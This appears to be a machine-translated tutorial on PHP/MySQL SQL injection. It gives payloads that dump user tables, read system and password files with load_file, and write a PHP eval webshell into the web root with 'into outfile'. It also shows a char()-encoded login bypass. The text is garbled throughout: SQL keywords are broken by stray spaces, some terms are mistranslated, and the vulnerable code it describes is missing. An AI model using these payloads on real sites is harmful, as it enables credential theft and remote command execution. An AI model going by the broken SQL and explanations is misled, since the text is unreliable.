Php script injection is simple and complex

The Php environment is generally apache + php + mysql, and the common configuration server is to open php. in the security mode in ini, set safe_mode to on, and set display_erors to off To Disable Error display. There is also an important configuration option ----- magic_quotes_gpc. The high version is on by default, and the previous version is off by default. When magic_quotes_gpc is on, how can we prevent php character Variable Injection? In fact, you only need to automatically convert all single quotes, double quotation marks, backslash, and empty ad characters in the submitted variables to escape characters containing the backslash. For example, if you change "'" to "" and "\" to "\", it will be OK. Next we will analyze the injection conditions of magic_quotes_gpc = off and magic_quotes_gpc = on.

Let's take a look at a piece of php code with a vulnerability, which is used for search.

From the code above, we can see that it is a search form that submits data through post and performs select queries. To analyze these vulnerabilities, we must first master the php language and mysql syntax. If we submit % 'order by id # (# indicates comment in mysql without executing the following SQL statement) from the form, or use 'order by id #, the introduced SQL statement becomes sele ct * from u ser wher e user name like '%' orde r by id # orde r by usern ame and selec t * from users w here username lik e '%' order by id # order by use ryme. In this way, all the database content will be returned, listing all user names and passwords. Of course, there are also update statement injection attacks, insert statement injection attacks, etc. The most common is union syntax injection, using the into outfile statement to export the php script Trojan.

First, you must understand some mysql statements, such as mysql> select load_file ('C:/boot. ini ') we can view the boot. the INI file content can be displayed by adding this query statement after the URL with the injection point. This shows the sensitive information that hackers want to obtain, for example, viewing the database connection file to obtain the database account, view ect/password information. Select * from table into outfile "C: \ Inetpub \ wwwroot \ shell. php "; that is, export the string from the table to C: Inetpubwwwrootshell. in php, hackers usually use create table rose (cmd text) to create a rose table when obtaining a mysql account. The field cmd is of the text type, and then use rose; open the rose table and insert into rose values ("<? P hp eva l ($ po s t [c m d]);?> ") Add a sentence to the field. Then selec t * from rose in to outfile "C: \ Inetpu B \ www ro ot \ shell. php "; export a trojan as a shell. PHP file, of course, this shell. php contains <? Php eval ($ _ po st [cm d]);?>, Anyone familiar with php knows what the consequences will be. When submitting parameters, You can execute the cmd command and upload a php Trojan.

When magic_quotes_gpc = on, all single quotation marks, double quotation marks, backslash, and null characters in the submission variable are automatically converted to escape characters containing the backslash. Injection of character type can prevent such characters, however, the numeric type does not use single quotes. The numeric type injection can also interpret the parameter as an integer through char () and return a string consisting of the ASCII characters of these integers, you can also use hexadecimal notation to replace characters. For example, enter http: // localhost/www/admin/login. php In the browser? Username = char (114,111,115,101) % 23

Assume that the user name we know above is rose, converted to ASCII, followed by char (114,111,115,101), % 23 is #

Table comment. Then the SQL statement becomes: select * from example where username = char (114,111,115,101) # and password = '', and the and password ='' is commented out, and We smoothly enter the background.